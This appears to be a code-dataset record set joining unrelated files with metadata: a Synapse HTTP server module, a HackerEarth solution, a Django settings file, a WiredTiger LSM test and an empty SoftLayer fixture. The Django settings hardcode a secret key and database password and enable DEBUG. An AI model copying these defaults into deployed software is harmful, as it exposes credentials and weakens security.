# -*- coding: utf-8 -*- # Copyright 2014-2016 OpenMarket Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from synapse.api.errors import ( cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes ) from synapse.util.logcontext import LoggingContext, PreserveLoggingContext from synapse.util.caches import intern_dict import synapse.metrics import synapse.events from canonicaljson import ( encode_canonical_json, encode_pretty_printed_json ) from twisted.internet import defer from twisted.web import server, resource from twisted.web.server import NOT_DONE_YET from twisted.web.util import redirectTo import collections import logging import urllib import ujson logger = logging.getLogger(__name__) metrics = synapse.metrics.get_metrics_for(__name__) incoming_requests_counter = metrics.register_counter( "requests", labels=["method", "servlet", "tag"], ) outgoing_responses_counter = metrics.register_counter( "responses", labels=["method", "code"], ) response_timer = metrics.register_distribution( "response_time", labels=["method", "servlet", "tag"] ) response_ru_utime = metrics.register_distribution( "response_ru_utime", labels=["method", "servlet", "tag"] ) response_ru_stime = metrics.register_distribution( "response_ru_stime", labels=["method", "servlet", "tag"] ) response_db_txn_count = metrics.register_distribution( "response_db_txn_count", labels=["method", "servlet", "tag"] ) response_db_txn_duration = metrics.register_distribution( 
"response_db_txn_duration", labels=["method", "servlet", "tag"] ) _next_request_id = 0 def request_handler(report_metrics=True): """Decorator for ``wrap_request_handler``""" return lambda request_handler: wrap_request_handler(request_handler, report_metrics) def wrap_request_handler(request_handler, report_metrics): """Wraps a method that acts as a request handler with the necessary logging and exception handling. The method must have a signature of "handle_foo(self, request)". The argument "self" must have "version_string" and "clock" attributes. The argument "request" must be a twisted HTTP request. The method must return a deferred. If the deferred succeeds we assume that a response has been sent. If the deferred fails with a SynapseError we use it to send a JSON response with the appropriate HTTP reponse code. If the deferred fails with any other type of error we send a 500 reponse. We insert a unique request-id into the logging context for this request and log the response and duration for this request. 
""" @defer.inlineCallbacks def wrapped_request_handler(self, request): global _next_request_id request_id = "%s-%s" % (request.method, _next_request_id) _next_request_id += 1 with LoggingContext(request_id) as request_context: if report_metrics: request_metrics = RequestMetrics() request_metrics.start(self.clock) request_context.request = request_id with request.processing(): try: with PreserveLoggingContext(request_context): yield request_handler(self, request) except CodeMessageException as e: code = e.code if isinstance(e, SynapseError): logger.info( "%s SynapseError: %s - %s", request, code, e.msg ) else: logger.exception(e) outgoing_responses_counter.inc(request.method, str(code)) respond_with_json( request, code, cs_exception(e), send_cors=True, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, ) except: logger.exception( "Failed handle request %s.%s on %r: %r", request_handler.__module__, request_handler.__name__, self, request ) respond_with_json( request, 500, { "error": "Internal server error", "errcode": Codes.UNKNOWN, }, send_cors=True ) finally: try: if report_metrics: request_metrics.stop( self.clock, request, self.__class__.__name__ ) except: pass return wrapped_request_handler class HttpServer(object): """ Interface for registering callbacks on a HTTP server """ def register_paths(self, method, path_patterns, callback): """ Register a callback that gets fired if we receive a http request with the given method for a path that matches the given regex. If the regex contains groups these gets passed to the calback via an unpacked tuple. Args: method (str): The method to listen to. path_patterns (list<SRE_Pattern>): The regex used to match requests. callback (function): The function to fire if we receive a matched request. The first argument will be the request object and subsequent arguments will be any matched groups from the regex. This should return a tuple of (code, response). 
""" pass class JsonResource(HttpServer, resource.Resource): """ This implements the HttpServer interface and provides JSON support for Resources. Register callbacks via register_path() Callbacks can return a tuple of status code and a dict in which case the the dict will automatically be sent to the client as a JSON object. The JsonResource is primarily intended for returning JSON, but callbacks may send something other than JSON, they may do so by using the methods on the request object and instead returning None. """ isLeaf = True _PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"]) def __init__(self, hs, canonical_json=True): resource.Resource.__init__(self) self.canonical_json = canonical_json self.clock = hs.get_clock() self.path_regexs = {} self.version_string = hs.version_string self.hs = hs def register_paths(self, method, path_patterns, callback): for path_pattern in path_patterns: self.path_regexs.setdefault(method, []).append( self._PathEntry(path_pattern, callback) ) def render(self, request): """ This gets called by twisted every time someone sends us a request. """ self._async_render(request) return server.NOT_DONE_YET # Disable metric reporting because _async_render does its own metrics. # It does its own metric reporting because _async_render dispatches to # a callback and it's the class name of that callback we want to report # against rather than the JsonResource itself. @request_handler(report_metrics=False) @defer.inlineCallbacks def _async_render(self, request): """ This gets called from render() every time someone sends us a request. This checks if anyone has registered a callback for that method and path. 
""" if request.method == "OPTIONS": self._send_response(request, 200, {}) return request_metrics = RequestMetrics() request_metrics.start(self.clock) # Loop through all the registered callbacks to check if the method # and path regex match for path_entry in self.path_regexs.get(request.method, []): m = path_entry.pattern.match(request.path) if not m: continue # We found a match! Trigger callback and then return the # returned response. We pass both the request and any # matched groups from the regex to the callback. callback = path_entry.callback servlet_instance = getattr(callback, "__self__", None) if servlet_instance is not None: servlet_classname = servlet_instance.__class__.__name__ else: servlet_classname = "%r" % callback kwargs = intern_dict({ name: urllib.unquote(value).decode("UTF-8") if value else value for name, value in m.groupdict().items() }) callback_return = yield callback(request, **kwargs) if callback_return is not None: code, response = callback_return self._send_response(request, code, response) try: request_metrics.stop(self.clock, request, servlet_classname) except: pass return # Huh. No one wanted to handle that? Fiiiiiine. Send 400. raise UnrecognizedRequestError() def _send_response(self, request, code, response_json_object, response_code_message=None): # could alternatively use request.notifyFinish() and flip a flag when # the Deferred fires, but since the flag is RIGHT THERE it seems like # a waste. if request._disconnected: logger.warn( "Not sending response to request %s, already disconnected.", request) return outgoing_responses_counter.inc(request.method, str(code)) # TODO: Only enable CORS for the requests that need it. 
respond_with_json( request, code, response_json_object, send_cors=True, response_code_message=response_code_message, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, canonical_json=self.canonical_json, ) class RequestMetrics(object): def start(self, clock): self.start = clock.time_msec() self.start_context = LoggingContext.current_context() def stop(self, clock, request, servlet_classname): context = LoggingContext.current_context() tag = "" if context: tag = context.tag if context != self.start_context: logger.warn( "Context have unexpectedly changed %r, %r", context, self.start_context ) return incoming_requests_counter.inc(request.method, servlet_classname, tag) response_timer.inc_by( clock.time_msec() - self.start, request.method, servlet_classname, tag ) ru_utime, ru_stime = context.get_resource_usage() response_ru_utime.inc_by( ru_utime, request.method, servlet_classname, tag ) response_ru_stime.inc_by( ru_stime, request.method, servlet_classname, tag ) response_db_txn_count.inc_by( context.db_txn_count, request.method, servlet_classname, tag ) response_db_txn_duration.inc_by( context.db_txn_duration, request.method, servlet_classname, tag ) class RootRedirect(resource.Resource): """Redirects the root '/' path to another path.""" def __init__(self, path): resource.Resource.__init__(self) self.url = path def render_GET(self, request): return redirectTo(self.url, request) def getChild(self, name, request): if len(name) == 0: return self # select ourselves as the child to render return resource.Resource.getChild(self, name, request) def respond_with_json(request, code, json_object, send_cors=False, response_code_message=None, pretty_print=False, version_string="", canonical_json=True): if pretty_print: json_bytes = encode_pretty_printed_json(json_object) + "\n" else: if canonical_json or synapse.events.USE_FROZEN_DICTS: json_bytes = encode_canonical_json(json_object) else: # ujson doesn't like frozen_dicts. 
json_bytes = ujson.dumps(json_object, ensure_ascii=False) return respond_with_json_bytes( request, code, json_bytes, send_cors=send_cors, response_code_message=response_code_message, version_string=version_string ) def respond_with_json_bytes(request, code, json_bytes, send_cors=False, version_string="", response_code_message=None): """Sends encoded JSON in response to the given request. Args: request (twisted.web.http.Request): The http request to respond to. code (int): The HTTP response code. json_bytes (bytes): The json bytes to use as the response body. send_cors (bool): Whether to send Cross-Origin Resource Sharing headers http://www.w3.org/TR/cors/ Returns: twisted.web.server.NOT_DONE_YET""" request.setResponseCode(code, message=response_code_message) request.setHeader(b"Content-Type", b"application/json") request.setHeader(b"Server", version_string) request.setHeader(b"Content-Length", b"%d" % (len(json_bytes),)) if send_cors: request.setHeader("Access-Control-Allow-Origin", "*") request.setHeader("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, OPTIONS") request.setHeader("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept") request.write(json_bytes) finish_request(request) return NOT_DONE_YET def finish_request(request): """ Finish writing the response to the request. Twisted throws a RuntimeException if the connection closed before the response was written but doesn't provide a convenient or reliable way to determine if the connection was closed. So we catch and log the RuntimeException You might think that ``request.notifyFinish`` could be used to tell if the request was finished. However the deferred it returns won't fire if the connection was already closed, meaning we'd have to have called the method right at the start of the request. By the time we want to write the response it will already be too late. 
""" try: request.finish() except RuntimeError as e: logger.info("Connection disconnected before response was written: %r", e) def _request_user_agent_is_curl(request): user_agents = request.requestHeaders.getRawHeaders( "User-Agent", default=[] ) for user_agent in user_agents: if "curl" in user_agent: return True return False
36.124424
88
0.637518
from synapse.api.errors import ( cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes ) from synapse.util.logcontext import LoggingContext, PreserveLoggingContext from synapse.util.caches import intern_dict import synapse.metrics import synapse.events from canonicaljson import ( encode_canonical_json, encode_pretty_printed_json ) from twisted.internet import defer from twisted.web import server, resource from twisted.web.server import NOT_DONE_YET from twisted.web.util import redirectTo import collections import logging import urllib import ujson logger = logging.getLogger(__name__) metrics = synapse.metrics.get_metrics_for(__name__) incoming_requests_counter = metrics.register_counter( "requests", labels=["method", "servlet", "tag"], ) outgoing_responses_counter = metrics.register_counter( "responses", labels=["method", "code"], ) response_timer = metrics.register_distribution( "response_time", labels=["method", "servlet", "tag"] ) response_ru_utime = metrics.register_distribution( "response_ru_utime", labels=["method", "servlet", "tag"] ) response_ru_stime = metrics.register_distribution( "response_ru_stime", labels=["method", "servlet", "tag"] ) response_db_txn_count = metrics.register_distribution( "response_db_txn_count", labels=["method", "servlet", "tag"] ) response_db_txn_duration = metrics.register_distribution( "response_db_txn_duration", labels=["method", "servlet", "tag"] ) _next_request_id = 0 def request_handler(report_metrics=True): return lambda request_handler: wrap_request_handler(request_handler, report_metrics) def wrap_request_handler(request_handler, report_metrics): @defer.inlineCallbacks def wrapped_request_handler(self, request): global _next_request_id request_id = "%s-%s" % (request.method, _next_request_id) _next_request_id += 1 with LoggingContext(request_id) as request_context: if report_metrics: request_metrics = RequestMetrics() request_metrics.start(self.clock) request_context.request = request_id with 
request.processing(): try: with PreserveLoggingContext(request_context): yield request_handler(self, request) except CodeMessageException as e: code = e.code if isinstance(e, SynapseError): logger.info( "%s SynapseError: %s - %s", request, code, e.msg ) else: logger.exception(e) outgoing_responses_counter.inc(request.method, str(code)) respond_with_json( request, code, cs_exception(e), send_cors=True, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, ) except: logger.exception( "Failed handle request %s.%s on %r: %r", request_handler.__module__, request_handler.__name__, self, request ) respond_with_json( request, 500, { "error": "Internal server error", "errcode": Codes.UNKNOWN, }, send_cors=True ) finally: try: if report_metrics: request_metrics.stop( self.clock, request, self.__class__.__name__ ) except: pass return wrapped_request_handler class HttpServer(object): def register_paths(self, method, path_patterns, callback): pass class JsonResource(HttpServer, resource.Resource): isLeaf = True _PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"]) def __init__(self, hs, canonical_json=True): resource.Resource.__init__(self) self.canonical_json = canonical_json self.clock = hs.get_clock() self.path_regexs = {} self.version_string = hs.version_string self.hs = hs def register_paths(self, method, path_patterns, callback): for path_pattern in path_patterns: self.path_regexs.setdefault(method, []).append( self._PathEntry(path_pattern, callback) ) def render(self, request): self._async_render(request) return server.NOT_DONE_YET # against rather than the JsonResource itself. 
@request_handler(report_metrics=False) @defer.inlineCallbacks def _async_render(self, request): if request.method == "OPTIONS": self._send_response(request, 200, {}) return request_metrics = RequestMetrics() request_metrics.start(self.clock) # Loop through all the registered callbacks to check if the method # and path regex match for path_entry in self.path_regexs.get(request.method, []): m = path_entry.pattern.match(request.path) if not m: continue # We found a match! Trigger callback and then return the # returned response. We pass both the request and any # matched groups from the regex to the callback. callback = path_entry.callback servlet_instance = getattr(callback, "__self__", None) if servlet_instance is not None: servlet_classname = servlet_instance.__class__.__name__ else: servlet_classname = "%r" % callback kwargs = intern_dict({ name: urllib.unquote(value).decode("UTF-8") if value else value for name, value in m.groupdict().items() }) callback_return = yield callback(request, **kwargs) if callback_return is not None: code, response = callback_return self._send_response(request, code, response) try: request_metrics.stop(self.clock, request, servlet_classname) except: pass return # Huh. No one wanted to handle that? Fiiiiiine. Send 400. raise UnrecognizedRequestError() def _send_response(self, request, code, response_json_object, response_code_message=None): # could alternatively use request.notifyFinish() and flip a flag when # the Deferred fires, but since the flag is RIGHT THERE it seems like # a waste. if request._disconnected: logger.warn( "Not sending response to request %s, already disconnected.", request) return outgoing_responses_counter.inc(request.method, str(code)) # TODO: Only enable CORS for the requests that need it. 
respond_with_json( request, code, response_json_object, send_cors=True, response_code_message=response_code_message, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, canonical_json=self.canonical_json, ) class RequestMetrics(object): def start(self, clock): self.start = clock.time_msec() self.start_context = LoggingContext.current_context() def stop(self, clock, request, servlet_classname): context = LoggingContext.current_context() tag = "" if context: tag = context.tag if context != self.start_context: logger.warn( "Context have unexpectedly changed %r, %r", context, self.start_context ) return incoming_requests_counter.inc(request.method, servlet_classname, tag) response_timer.inc_by( clock.time_msec() - self.start, request.method, servlet_classname, tag ) ru_utime, ru_stime = context.get_resource_usage() response_ru_utime.inc_by( ru_utime, request.method, servlet_classname, tag ) response_ru_stime.inc_by( ru_stime, request.method, servlet_classname, tag ) response_db_txn_count.inc_by( context.db_txn_count, request.method, servlet_classname, tag ) response_db_txn_duration.inc_by( context.db_txn_duration, request.method, servlet_classname, tag ) class RootRedirect(resource.Resource): def __init__(self, path): resource.Resource.__init__(self) self.url = path def render_GET(self, request): return redirectTo(self.url, request) def getChild(self, name, request): if len(name) == 0: return self # select ourselves as the child to render return resource.Resource.getChild(self, name, request) def respond_with_json(request, code, json_object, send_cors=False, response_code_message=None, pretty_print=False, version_string="", canonical_json=True): if pretty_print: json_bytes = encode_pretty_printed_json(json_object) + "\n" else: if canonical_json or synapse.events.USE_FROZEN_DICTS: json_bytes = encode_canonical_json(json_object) else: # ujson doesn't like frozen_dicts. 
json_bytes = ujson.dumps(json_object, ensure_ascii=False) return respond_with_json_bytes( request, code, json_bytes, send_cors=send_cors, response_code_message=response_code_message, version_string=version_string ) def respond_with_json_bytes(request, code, json_bytes, send_cors=False, version_string="", response_code_message=None): request.setResponseCode(code, message=response_code_message) request.setHeader(b"Content-Type", b"application/json") request.setHeader(b"Server", version_string) request.setHeader(b"Content-Length", b"%d" % (len(json_bytes),)) if send_cors: request.setHeader("Access-Control-Allow-Origin", "*") request.setHeader("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, OPTIONS") request.setHeader("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept") request.write(json_bytes) finish_request(request) return NOT_DONE_YET def finish_request(request): try: request.finish() except RuntimeError as e: logger.info("Connection disconnected before response was written: %r", e) def _request_user_agent_is_curl(request): user_agents = request.requestHeaders.getRawHeaders( "User-Agent", default=[] ) for user_agent in user_agents: if "curl" in user_agent: return True return False
true
true
f705ae64cdecffa5cafbe9b36e37245e035fb0b5
1,380
py
Python
hackerearth/Algorithms/Feasible relations/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
4
2020-07-24T01:59:50.000Z
2021-07-24T15:14:08.000Z
hackerearth/Algorithms/Feasible relations/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
hackerearth/Algorithms/Feasible relations/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
""" # Sample code to perform I/O: name = input() # Reading input from STDIN print('Hi, %s.' % name) # Writing output to STDOUT # Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail """ # Write your code here from collections import deque, defaultdict from sys import stdin def check_connected(x, connected, adjacency): stack = deque([x]) while stack: u = stack.pop() for v in adjacency[u]: if v not in connected: connected[v] = x stack.append(v) t = int(stdin.readline()) for _ in range(t): n, k = map(int, stdin.readline().strip().split()) equalities = defaultdict(set) inequalities = [] for _ in range(k): x1, r, x2 = stdin.readline().strip().split() x1 = int(x1) x2 = int(x2) if r == '=': equalities[x1].add(x2) equalities[x2].add(x1) else: inequalities.append((x1, x2)) connected_components = {} for i in range(1, n + 1): if i not in connected_components: connected_components[i] = i check_connected(i, connected_components, equalities) for x1, x2 in inequalities: if connected_components[x1] == connected_components[x2]: print('NO') break else: print('YES')
27.6
94
0.571739
from collections import deque, defaultdict from sys import stdin def check_connected(x, connected, adjacency): stack = deque([x]) while stack: u = stack.pop() for v in adjacency[u]: if v not in connected: connected[v] = x stack.append(v) t = int(stdin.readline()) for _ in range(t): n, k = map(int, stdin.readline().strip().split()) equalities = defaultdict(set) inequalities = [] for _ in range(k): x1, r, x2 = stdin.readline().strip().split() x1 = int(x1) x2 = int(x2) if r == '=': equalities[x1].add(x2) equalities[x2].add(x1) else: inequalities.append((x1, x2)) connected_components = {} for i in range(1, n + 1): if i not in connected_components: connected_components[i] = i check_connected(i, connected_components, equalities) for x1, x2 in inequalities: if connected_components[x1] == connected_components[x2]: print('NO') break else: print('YES')
true
true
f705ae9c256c532814c09ac996b19cab9acfb4e3
2,527
py
Python
old/apply/apply/settings.py
neonsoftware/yard
5f2fda72c7a3f330d2442002687ff4d1dfb21680
[ "MIT" ]
1
2015-03-11T07:43:09.000Z
2015-03-11T07:43:09.000Z
old/apply/apply/settings.py
neonsoftware/yard
5f2fda72c7a3f330d2442002687ff4d1dfb21680
[ "MIT" ]
5
2015-05-17T18:22:29.000Z
2015-08-15T17:27:03.000Z
old/apply/apply/settings.py
neonsoftware/yard
5f2fda72c7a3f330d2442002687ff4d1dfb21680
[ "MIT" ]
null
null
null
""" Django settings for apply project. For more information on this file, see https://docs.djangoproject.com/en/1.6/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.6/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'gunicorn', 'bootstrapform', 'yard', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'apply.urls' WSGI_APPLICATION = 'apply.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': 'yard', # Or path to database file if using sqlite3. 'USER': 'frankie', # Not used with sqlite3. 'PASSWORD': 'frankie', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. 
} } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ STATIC_URL = '/static/' DOCS_URL = BASE_DIR + '/yard/static/docs/' LOGGING = { 'version': 1, } LOGIN_REDIRECT_URL="/"
25.019802
103
0.688564
import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i' DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'gunicorn', 'bootstrapform', 'yard', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'apply.urls' WSGI_APPLICATION = 'apply.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': 'yard', # Or path to database file if using sqlite3. 'USER': 'frankie', # Not used with sqlite3. 'PASSWORD': 'frankie', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. } } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ STATIC_URL = '/static/' DOCS_URL = BASE_DIR + '/yard/static/docs/' LOGGING = { 'version': 1, } LOGIN_REDIRECT_URL="/"
true
true
f705af023850008c9327aaee200ad9ea7dc63b24
405
py
Python
config/wsgi.py
bertini36/boatsandjoy-api
b22d82eb02947218d924b381160d622ded9e1d98
[ "MIT" ]
null
null
null
config/wsgi.py
bertini36/boatsandjoy-api
b22d82eb02947218d924b381160d622ded9e1d98
[ "MIT" ]
12
2021-04-08T21:18:37.000Z
2022-03-12T00:39:39.000Z
config/wsgi.py
bertini36/boatsandjoy-api
b22d82eb02947218d924b381160d622ded9e1d98
[ "MIT" ]
null
null
null
""" WSGI config for Boats & Joy project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production') application = get_wsgi_application()
23.823529
78
0.782716
import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production') application = get_wsgi_application()
true
true
f705b09b0a46fccb8f3405bc8e17fc8dd4cacc82
3,609
py
Python
src/third_party/wiredtiger/test/suite/test_lsm01.py
mwhudson/mongo
914bbbd26a686e032fdddec964b109ea78c6e6f6
[ "Apache-2.0" ]
14
2019-01-11T05:01:29.000Z
2021-11-01T00:39:46.000Z
src/third_party/wiredtiger/test/suite/test_lsm01.py
mwhudson/mongo
914bbbd26a686e032fdddec964b109ea78c6e6f6
[ "Apache-2.0" ]
1
2022-03-05T02:55:28.000Z
2022-03-05T05:28:00.000Z
src/third_party/wiredtiger/test/suite/test_lsm01.py
mwhudson/mongo
914bbbd26a686e032fdddec964b109ea78c6e6f6
[ "Apache-2.0" ]
7
2019-02-08T16:28:36.000Z
2021-05-08T14:25:47.000Z
#!/usr/bin/env python # # Public Domain 2014-2016 MongoDB, Inc. # Public Domain 2008-2014 WiredTiger, Inc. # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. import wiredtiger, wtscenario, wttest from wtdataset import SimpleDataSet # test_lsm01.py # Test LSM tree configuration options. 
class test_lsm01(wttest.WiredTigerTestCase): K = 1024 M = 1024 * K G = 1024 * M uri = "lsm:test_lsm01" chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size', [1*M,20*M,None], [0.6,0.6,0.6]) merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max', [2,10,20,None], None) bloom_scenarios = wtscenario.quick_scenarios('s_bloom', [True,False,None], None) bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count', [2,8,20,None], None) bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count', [2,10,20,None], None) # Occasionally add a lot of records, so that merges (and bloom) happen. record_count_scenarios = wtscenario.quick_scenarios( 'nrecs', [10, 10000], [0.9, 0.1]) config_vars = [ 'chunk_size', 'merge_max', 'bloom', 'bloom_bit_count', 'bloom_hash_count' ] scenarios = wtscenario.make_scenarios( chunk_size_scenarios, merge_max_scenarios, bloom_scenarios, bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios, prune=100, prunelong=500) # Test drop of an object. def test_lsm(self): args = 'key_format=S' args += ',lsm=(' # Start the LSM configuration options. # add names to args, e.g. args += ',session_max=30' for var in self.config_vars: value = getattr(self, 's_' + var) if value != None: if var == 'verbose': value = '[' + str(value) + ']' if value == True: value = 'true' if value == False: value = 'false' args += ',' + var + '=' + str(value) args += ')' # Close the LSM configuration option group self.verbose(3, 'Test LSM with config: ' + args + ' count: ' + str(self.nrecs)) SimpleDataSet(self, self.uri, self.nrecs).populate() # TODO: Adding an explicit drop here can cause deadlocks, if a merge # is still happening. See issue #349. # self.session.drop(self.uri) if __name__ == '__main__': wttest.run()
41.011364
76
0.665281
import wiredtiger, wtscenario, wttest from wtdataset import SimpleDataSet class test_lsm01(wttest.WiredTigerTestCase): K = 1024 M = 1024 * K G = 1024 * M uri = "lsm:test_lsm01" chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size', [1*M,20*M,None], [0.6,0.6,0.6]) merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max', [2,10,20,None], None) bloom_scenarios = wtscenario.quick_scenarios('s_bloom', [True,False,None], None) bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count', [2,8,20,None], None) bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count', [2,10,20,None], None) record_count_scenarios = wtscenario.quick_scenarios( 'nrecs', [10, 10000], [0.9, 0.1]) config_vars = [ 'chunk_size', 'merge_max', 'bloom', 'bloom_bit_count', 'bloom_hash_count' ] scenarios = wtscenario.make_scenarios( chunk_size_scenarios, merge_max_scenarios, bloom_scenarios, bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios, prune=100, prunelong=500) def test_lsm(self): args = 'key_format=S' args += ',lsm=(' for var in self.config_vars: value = getattr(self, 's_' + var) if value != None: if var == 'verbose': value = '[' + str(value) + ']' if value == True: value = 'true' if value == False: value = 'false' args += ',' + var + '=' + str(value) args += ')' self.verbose(3, 'Test LSM with config: ' + args + ' count: ' + str(self.nrecs)) SimpleDataSet(self, self.uri, self.nrecs).populate() if __name__ == '__main__': wttest.run()
true
true
f705b0edb87ae2c78f1229ba615f3eb737a2e382
68,829
py
Python
SoftLayer/fixtures/SoftLayer_Product_Package.py
kz6fittycent/softlayer-python
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
[ "MIT" ]
null
null
null
SoftLayer/fixtures/SoftLayer_Product_Package.py
kz6fittycent/softlayer-python
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
[ "MIT" ]
null
null
null
SoftLayer/fixtures/SoftLayer_Product_Package.py
kz6fittycent/softlayer-python
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
[ "MIT" ]
null
null
null
